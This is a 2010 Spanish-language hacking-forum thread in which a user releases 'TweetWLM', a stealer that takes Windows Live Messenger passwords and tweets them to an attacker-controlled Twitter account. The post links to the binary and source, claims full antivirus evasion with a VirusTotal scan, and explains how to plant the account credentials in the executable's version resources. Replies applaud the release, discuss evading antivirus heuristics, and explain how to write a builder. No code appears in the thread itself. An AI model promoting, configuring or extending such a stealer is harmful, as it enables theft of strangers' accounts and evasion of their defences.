Foro de elhacker.net

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: Karcrack en 12 Julio 2010, 03:15 am



Título: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: Karcrack en 12 Julio 2010, 03:15 am
Bueno, TweetWLM, como yo lo he bautizado, es una simple aplicacion programada por mi que recupera las contraseñas del WLM y las Tweetea en tu Twitter >:D >:D Es recomendable tener un twitter cerrado al publico para ese uso ::)

Es FUD:
Código:
http://www.virustotal.com/es/analisis/f34627c59552a4c0f721786488a3af25a85b6d9cdbb0f5f675621f8c471fdeea-1278896349
Estoy al corriente de que VT comparte las muestras, pero no me preocupa, cualquiera que tenga idea sobre programacion es capaz de hacer FUD el codigo de nuevo ;)

Descargar:
Bin:
Código:
http://www.box.net/shared/a8vpqkp5mf
Src:
Código:
http://www.box.net/shared/pozkqp2n7f

El codigo y el binario pertenecen unicamente al STUB asi que para establecer la cuenta de twitter donde se postearan las contraseñas teneis que seguir estas instrucciones:
  • Abrir el ejecutable con un programa que permita modificar la informacion de version del fichero
  • Poner en el valor 'Comments' la contraseña de la cuenta
  • Poner en el valor 'ProductName' el nombre de la cuenta
Ejemplo:
(http://img197.imageshack.us/img197/6676/dibujovaj.th.jpg) (http://img197.imageshack.us/i/dibujovaj.jpg/)

No se si queda muy claro este post, pero tengo sueño, asi que buenas noches :xD


Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: Jaixon Jax en 12 Julio 2010, 03:41 am
  Woooow Karcrack valla aportazo   ;D


  Descargando Source  :silbar: .......


Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: [Zero] en 12 Julio 2010, 13:45 pm
Muy bueno, no viste el partido o que?  :xD. Me bajo el source a ver si entiendo algo, sino me los explicas por MSN  ;D.

Saludos


Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: Karcrack en 12 Julio 2010, 14:17 pm
Muy bueno, no viste el partido o que?  :xD. Me bajo el source a ver si entiendo algo, sino me los explicas por MSN  ;D.

Saludos
Claro que lo vi ::) ::) ::) ::) ::)
Esto lo tenia hecho hacia tiempo... y para celebrar que gano la roja lo he compartido con todos :)


Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: [L]ord [R]NA en 12 Julio 2010, 17:46 pm
:xD vaya aporte.


Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: Karcrack en 12 Julio 2010, 20:44 pm
Tengo pensado para futuras versiones:
  • Añadir builder
  • Codificar usuario y contraseña del Twitter... eso de que este en texto plano no me mola nada..  pero soy muy vago :xD
  • Optimizar la compilacion del ejecutable... ya que son 20kb de stub... y se puede dejar tranquilamente en 9kb ;D
  • FWB
  • Melt
  • Mutex
  • Me estoy planteando continuar el proyecto en C :-\...

Saludos ;)


Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: Horricreu en 12 Julio 2010, 22:20 pm
Luego voy a probarlo que tengo muchas ganas ;D Parece muy interesante...

Tengo pensado para futuras versiones:
  • Añadir builder
  • Codificar usuario y contraseña del Twitter... eso de que este en texto plano no me mola nada..  pero soy muy vago :xD
  • Optimizar la compilacion del ejecutable... ya que son 20kb de stub... y se puede dejar tranquilamente en 9kb ;D
  • FWB
  • Melt
  • Mutex
  • Me estoy planteando continuar el proyecto en C :-\...

Saludos ;)

Me gusta la última idea ;-) ;D

Saludos :P


Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: Elemental Code en 14 Julio 2010, 21:26 pm
me gusto la idea de poner los datos en los comentarios del exe.

con eso te sacas de ensima la heuristica de los av cuando detectan que te abris a vos mismo.

Muy bueno, ya veo el codigo.



esteeeee...

me trabe.
quise armar un builder y me di cuenta de que no tengo ni idea de como cambiar la informacion del ejecutable...

voy a googlear, si alguien sabe me avisa?


Título: Re: [SRC][FUUUD] TweetWLM - Aplicacion que te 'pia' las contraseñas del WLM
Publicado por: [Zero] en 15 Julio 2010, 14:30 pm
La información está en el resource, tienes que utilizar las API's de manejo de recursos para encontrar leer y/o cambiar el valor.

Saludos